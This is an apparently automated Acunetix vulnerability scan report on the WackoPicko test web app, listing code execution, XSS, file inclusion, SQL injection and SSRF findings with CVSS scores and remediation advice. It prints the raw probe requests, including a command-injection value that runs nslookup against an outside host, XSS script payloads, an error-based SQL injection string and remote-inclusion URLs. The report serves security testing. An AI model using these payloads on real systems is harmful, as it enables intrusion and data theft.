Report
Acunetix Security Audit
09 June 2020
Generated by Acunetix
Selected vulnerabilities
Scan details
Scan information
Start url http://192.168.1.124/WackoPicko/
Host http://192.168.1.124/
Threat level
One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.
Alerts distribution
Code execution
Classification
CVSS2
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 9.1
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE: CWE-94
Affected items Variation
/WackoPicko/passcheck.php 1
Cross site scripting
Classification
CVSS2
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CWE: CWE-79
Affected items Variation
/WackoPicko/guestbook.php 1
/WackoPicko/pictures/search.php 1
/WackoPicko/users/login.php 1
File inclusion
Classification
CVSS2
Base Score: 7.5
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE: CWE-20
Affected items Variation
/WackoPicko/admin/index.php 2
Remote file inclusion XSS
Classification
CVSS2
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
CWE: CWE-79
Affected items Variation
/WackoPicko/admin/index.php 2
SQL injection
Classification
CVSS2
Base Score: 6.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 10.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: None
CWE: CWE-89
Affected items Variation
/WackoPicko/users/login.php 1
Server side request forgery
Classification
CVSS2
Base Score: 5.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CVSS3
Base Score: 9.0
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: High
Availability Impact: High
CWE: CWE-918
Affected items Variation
/WackoPicko/admin/index.php 2
Alerts details
Code execution
Severity High
Reported by module /Scripts/PerScheme/Code_Execution.script
Description
Code injection vulnerabilities occur where the output or content served from a web application can be manipulated in such
a way that it triggers server-side code execution. In some poorly written web applications that allow users to modify
server-side files (for example by posting to a message board or guestbook), it is sometimes possible to inject code in the
scripting language of the application itself.
Impact
A malicious user may execute arbitrary system commands with the permissions of the web server.
Recommendation
References
Affected items
/WackoPicko/passcheck.php
Details
URL encoded POST input password was set to $(nslookup hitcHBX8q1QN7f0d6f.bxss.me)
Request headers
POST /WackoPicko/passcheck.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 51
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
password=%24(nslookup%20hitcHBX8q1QN7f0d6f.bxss.me)
Cross site scripting
Severity High
Reported by module /Scripts/PerScheme/XSS.script
Description
Cross-site Scripting (XSS) refers to a client-side code injection attack in which an attacker can execute malicious scripts in
a legitimate website or web application. XSS occurs when a web application uses unvalidated or unencoded user input
within the output it generates.
Impact
Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.
Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.
Recommendation
References
Affected items
/WackoPicko/guestbook.php
Verified vulnerability
Details
URL encoded POST input comment was set to 555'"()&%<acx><ScRiPt >EVua(9983)</ScRiPt>
Request headers
POST /WackoPicko/guestbook.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 70
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
comment=555'"()%26%25<acx><ScRiPt%20>EVua(9983)</ScRiPt>&name=UHOdllxh
/WackoPicko/pictures/search.php
Verified vulnerability
Details
URL encoded GET input query was set to 1'"()&%<acx><ScRiPt >wU91(9983)</ScRiPt>
Request headers
GET /WackoPicko/pictures/search.php?query=1'"()%26%25<acx><ScRiPt%20>wU91(9983)</ScRiPt> HTTP/1.1
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
/WackoPicko/users/login.php
Verified vulnerability
Details
URL encoded POST input username was set to UHOdllxh'"()&%<acx><ScRiPt >XCbr(9711)</ScRiPt>
Request headers
POST /WackoPicko/users/login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 88
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
password=g00dPa%24%24w0rD&username=UHOdllxh'"()%26%25<acx><ScRiPt%20>XCbr(9711)</ScRiPt>
File inclusion
Severity High
Reported by module /Scripts/PerScheme/File_Inclusion.script
Description
This script appears to include a file whose name is determined using user-supplied data. This data is not properly
validated before being passed to the include function.
Impact
It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with
the privileges of the web-server.
Recommendation
Edit the source code to ensure that input is properly validated. Where possible, it is recommended to make a list of
accepted filenames and restrict the input to that list.
For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file
using a URL rather than a local file path. It is recommended to disable this option in php.ini.
References
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://bxss.me/t/fit.txt%3F.jpg
Pattern found:
63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
Request headers
POST /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://bxss.me/t/fit.txt%3F.jpg
Pattern found:
63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
Request headers
GET /WackoPicko/admin/index.php?page=http://bxss.me/t/fit.txt%3F.jpg HTTP/1.1
Referer: http://192.168.1.124/WackoPicko/
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remote file inclusion XSS
Severity High
Reported by module /Scripts/PerScheme/Remote_File_Inclusion_XSS.script
Description
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the
form of JavaScript) to another user. The server opens arbitrary URLs and puts the content retrieved from the URL into the
response without filtering.
Impact
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in
order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the
user. It is also possible to modify the content of the page presented to the user.
Recommendation
Your server-side code should verify whether the URL from the user input is allowed to be retrieved and displayed, or filter
the response from the URL according to the context in which it is displayed.
References
Affected items
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to HttP://bxss.me/t/xss.html?%00
Request headers
POST /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to HttP://bxss.me/t/xss.html?%00
Request headers
GET /WackoPicko/admin/index.php?page=HttP://bxss.me/t/xss.html%3F%2500 HTTP/1.1
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
SQL injection
Severity High
Reported by module /Scripts/PerScheme/Sql_Injection.script
Description
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a
web application's database server.
Impact
An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and
retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database,
affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands,
which may then be used to escalate an attack even further.
Recommendation
Use parameterized queries when dealing with SQL queries that contain user input. Parameterized queries allow the
database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.
References
Affected items
/WackoPicko/users/login.php
Verified vulnerability
Details
URL encoded POST input username was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(57),CHAR(67),CHAR(121),CHAR(52),CHAR(79),CHAR(50),CHAR(69)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
4CuQ9Cy4O2E
Request headers
POST /WackoPicko/users/login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 355
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
password=g00dPa%24%24w0rD&username='and(select%201%20from(select%20count(*)%2Cconcat((select%20concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(81)%2CCHAR(57)%2CCHAR(67)%2CCHAR(121)%2CCHAR(52)%2CCHAR(79)%2CCHAR(50)%2CCHAR(69))%20from%20information_schema.tables%20limit%200%2C1)%2Cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
Server side request forgery
Severity High
Reported by module /Scripts/PerScheme/Server_Side_Request_Forgery.script
Description
SSRF (Server Side Request Forgery) is a vulnerability that allows an attacker to force server interfaces into sending
packets initiated by the victim server to the local interface or to another server behind the firewall. Consult the Web
References for more information about this problem.
Impact
Recommendation
References
Affected items
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://hitm1YRhASIND.bxss.me/
An HTTP request was initiated for the domain hitm1YRhASIND.bxss.me, which indicates that this script is vulnerable to SSRF.
IP address: 179.8.237.20
User agent:
Request headers
POST /WackoPicko/admin/index.php?page=http://hitm1YRhASIND.bxss.me/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 41
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
adminname=g00dPa%24%24w0rD&password=login
/WackoPicko/admin/index.php
Details
URL encoded GET input page was set to http://hitYWkgofMX4F.bxss.me/
An HTTP request was initiated for the domain hitYWkgofMX4F.bxss.me, which indicates that this script is vulnerable to SSRF.
IP address: 179.8.237.20
User agent:
Request headers
GET /WackoPicko/admin/index.php?page=http://hitYWkgofMX4F.bxss.me/ HTTP/1.1
Connection: keep-alive
Cookie: PHPSESSID=2e3b206v38bnkrsta0kd3bc4u5
Accept: */*
Accept-Encoding: gzip,deflate
Host: 192.168.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Scanned items (coverage report)
http://192.168.1.124/WackoPicko/admin/index.php
http://192.168.1.124/WackoPicko/guestbook.php
http://192.168.1.124/WackoPicko/passcheck.php
http://192.168.1.124/WackoPicko/pictures/search.php
http://192.168.1.124/WackoPicko/users/login.php